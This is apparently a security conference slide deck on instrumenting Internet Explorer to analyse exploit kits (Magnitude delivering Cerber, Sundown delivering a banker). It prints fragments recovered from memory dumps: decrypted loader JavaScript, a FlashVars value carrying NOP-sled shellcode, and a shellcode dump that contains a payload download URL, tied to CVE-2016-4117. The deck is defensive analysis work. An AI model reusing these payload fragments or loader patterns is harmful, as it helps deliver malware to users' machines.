Browser Instrumentation for Exploit Analysis
Mihai Neagu, Bitdefender

About
• Mihai Neagu – Exploit research @ Bitdefender
• Past: cloud-based protocols, data encryption, reverse engineering

Summary
• Exploit Kits
• Magnitude/Cerber demo
• The problem
• Browser instrumentation
• Sundown/Banker demo
• Word of advice

Exploit Kits – exploit delivery service
What I'm interested in:
• What's the Exploit Kit
• What's the exploit
• What's the malware

Exploit Demo – Magnitude/Cerber

Behavior analysis – traffic inspection
• HTML – compromised website
• HTML – gateway
• HTML – Magnitude EK landing
• SWF – Flash Selector
• SWF – Flash Dropper
• ? – unknown
• EXE – payload, Cerber

Behavior analysis – process activity
• Internet Explorer – download+execute Flash Selector
• Internet Explorer – download+execute Flash Dropper
• ? – unknown
• Internet Explorer – download+execute Cerber

The problem
• Flash Dropper has no exploit code
• Where is the actual exploit?
• How is Cerber downloaded and executed?
• We need more in-depth inspection

Something's hidden
• Flash Dropper (Stage 1) decrypts Flash Exploit (Stage 2) in memory
• Calls loadBytes on the decrypted bytes
• Stage 2 performs the actual exploitation

    // decrypt ...
    // execute Stage 2
    this.loader.loadBytes(_loc2_);

• We need the contents of _loc2_, the parameter of loadBytes
• We need memory inspection

Browser instrumentation

Browser instrumentation – hook points
• Dynamic HTML load: document.write() – mshtml.dll, CElement::InjectTextOrHTML
• Dynamic JS load: eval() – jscript9.dll, Js::GlobalObject::DefaultEvalHelper
• Dynamic object instantiation, parameters: object parameter – mshtml.dll, CPropertyBag::AddProp
• Dynamic Flash load: loadBytes() – flash.dll, Loader.loadBytes
• Bonus – dry run, block payload execution: kernel32.dll, CreateProcess, WriteProcessMemory

Exploit Demo – Sundown/Banker

Memory dumps analysis
• Decrypted JS

    var SFfbfv = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="21" height="32">';
    SFfbfv = SFfbfv + '<param name="movie" value="'+ hkcgdshfkj +'" />';
    SFfbfv = SFfbfv + '<param name="play" value="true"/>';
    SFfbfv = SFfbfv + '<!--[if !IE]>-->';
    SFfbfv = SFfbfv + '<object type="application/x-shockwave-flash" data="'+ hkcgdshfkj +'" allowScriptAccess=always width="11" height="14">';
Memory dumps analysis
• Flash Loader object instantiation

    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="21" height="32">
      <param name="movie" value="…/489567945678456874356487356743256.swf" />
      <param name="play" value="true"/>
      <param name=FlashVars value="exec=90909090909090909090909090909090909090909090909090909090909090909090EB7133C9648B71308B760C8B761C8B5E088B…" />
      ...
    </object>

Memory dumps analysis
• Shellcode (memory dump, rows reconstructed from the slide)

    0000000000: 90 90 90 90 90 90 90 90 │ 90 90 90 90 90 90 90 90  ????????????????
    ...
    0000000120: ...
    ...
    0000000180: D0 7A 2E 74 6D 70 00 21 │ 21 21 21 21 21 21 21 21  Dz.tmp.!!!!!!!!!
    0000000190: 21 21 21 21 21 21 21 FF │ 70 C7 FD DE C0 AF DA 68  !!!!!!!ÿpÇy_A_Uh
    00000001A0: 74 74 70 3A 2F 2F 66 76 │ 34 2E 32 32 35 32 39 31  ttp://fv4.225291
    00000001B0: 32 2E 63 6F 6D 2F 7A 2E │ 70 68 70 3F 69 64 3D 31  2.com/z.php?id=1

Memory dumps analysis
• Flash Exploit, actual exploitation

    public dynamic class Data4 extends DeleteRangeTimelineOperation
    …
    public static var flash78:Placement;
    …

• Vulnerability identified: CVE-2016-4117 (Flash type confusion)

Word of advice
Use modern mitigations
• Windows 10 – Control Flow Guard
• Chrome, Edge – powerful sandboxing features
Also use these
• AdBlock – block malvertising
• Backup – restore encrypted files

Thanks for watching!